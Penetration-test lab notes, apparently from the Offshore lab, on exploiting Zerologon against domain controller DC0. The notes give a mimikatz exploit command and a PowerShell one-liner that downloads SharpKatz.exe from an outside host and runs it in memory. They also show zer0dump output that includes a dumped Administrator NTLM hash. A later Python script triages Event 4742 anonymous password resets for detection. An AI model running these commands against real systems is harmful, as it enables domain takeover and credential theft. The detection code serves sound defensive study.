Zerologon

  1. The file found on JOE-LPTP indicated that the DC0 domain controller is vulnerable to Zerologon.
  2. Exploiting it with different tools did not work through proxychains.
  3. It worked using sshuttle.

Using secretsdump and Impacket

Using mimikatz

mimikatz.exe "lsadump::zerologon /target:lab.offshore.local /account:dc0$ /exploit"

Using Sharpkatz

$data=(New-Object System.Net.WebClient).DownloadData('http://10.10.14.3:80/SharpKatz.exe'); $asm = [System.Reflection.Assembly]::Load([byte[]]$data); $out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter); [SharpKatz.Program]::Main("--Command zerologon --Mode auto --Target DC0.lab.offshore.local --MachineAccount DC0$ --Domain lab.offshore.local --User administrator --DomainController DC0.lab.offshore.local".Split());[Console]::SetOut($out);$sWriter.ToString()

Using zer0dump

sshuttle -v -e "ssh -i id_rsa" -r root@10.10.110.123 -N
python zer0dump.py 172.16.1.200 -target_machine=DC0
Namespace(port=445, silver=False, target='172.16.1.200', target_da=None, target_machine='DC0')
Performing authentication attempts...
172.16.1.200
DC0
=========================================================
Success! DC can be fully compromised by a Zerologon attack.

NetrServerPasswordSet2Response
ReturnAuthenticator:
    Credential:
        Data:                            b'\x01\xd9\x9f.\xdd\x9e\x05='
    Timestamp:                       0
ErrorCode:                       0

Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea:::
aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea
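Defender-side view of the same step, as an added example that is not part of the note or of zer0dump: the NetrServerPasswordSet2 reset reported above is recorded on the DC as Security Event 4742 ("A computer account was changed") whose subject is ANONYMOUS LOGON (SID S-1-5-7), so a simple triage over 4742 records can surface it. The pipe-delimited record format, the sample lines and the DC_ACCOUNTS set (DC0$ from this lab) are constructed for the example.

```python
"""Triage Windows Security Event 4742 records for Zerologon-style resets.
Added example for this note (not code from the page or the tools it lists).
Zerologon ends with NetrServerPasswordSet2 resetting a machine account
password; the DC logs that as 4742 with subject ANONYMOUS LOGON (S-1-5-7),
whereas routine rotations are performed by the computer account itself."""
from dataclasses import dataclass
from typing import List, Tuple

ANONYMOUS_LOGON_SID = "S-1-5-7"
DC_ACCOUNTS = {"DC0$"}   # DC machine accounts in this lab (DC0 from the note)

@dataclass
class Event4742:
    subject_sid: str    # who made the change
    subject_name: str
    target_name: str    # account that was changed, e.g. "DC0$"
    changed_attrs: str  # attributes that changed, ';'-separated

def parse_events(text: str) -> List[Event4742]:
    """Parse constructed records of the form id|sid|subject|target|attrs."""
    events = []
    for line in text.strip().splitlines():
        event_id, sid, subject, target, attrs = line.split("|")
        if event_id == "4742":          # ignore other event types
            events.append(Event4742(sid, subject, target, attrs))
    return events

def is_zerologon_reset(ev: Event4742) -> bool:
    """An unauthenticated subject reset a machine account's password."""
    return (ev.subject_sid == ANONYMOUS_LOGON_SID
            and ev.target_name.endswith("$")
            and "Password Last Set" in ev.changed_attrs.split(";"))

def triage(events: List[Event4742]) -> List[Tuple[str, str]]:
    """Return (target, severity); resetting a DC's own account is critical."""
    hits = []
    for ev in events:
        if is_zerologon_reset(ev):
            sev = "critical" if ev.target_name.upper() in DC_ACCOUNTS else "high"
            hits.append((ev.target_name, sev))
    return hits

# Constructed sample records, not real log data.
SAMPLE_LOG = """
4742|S-1-5-21-1-2-3-1105|WS01$|WS01$|Password Last Set
4742|S-1-5-7|ANONYMOUS LOGON|DC0$|Password Last Set
4742|S-1-5-21-1-2-3-500|Administrator|DC0$|Service Principal Names
4742|S-1-5-7|ANONYMOUS LOGON|WS01$|Password Last Set
4624|S-1-5-7|ANONYMOUS LOGON|DC0$|-
"""
```

On a real DC the same fields come from the 4742 XML (SubjectUserSid, TargetUserName, PasswordLastSet), and the Netlogon events 5827 to 5829 introduced with the August 2020 patch cover the non-compliant secure channel side.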

Alternate method if two DCs are present

https://dirkjanm.io/a-different-way-of-abusing-zerologon/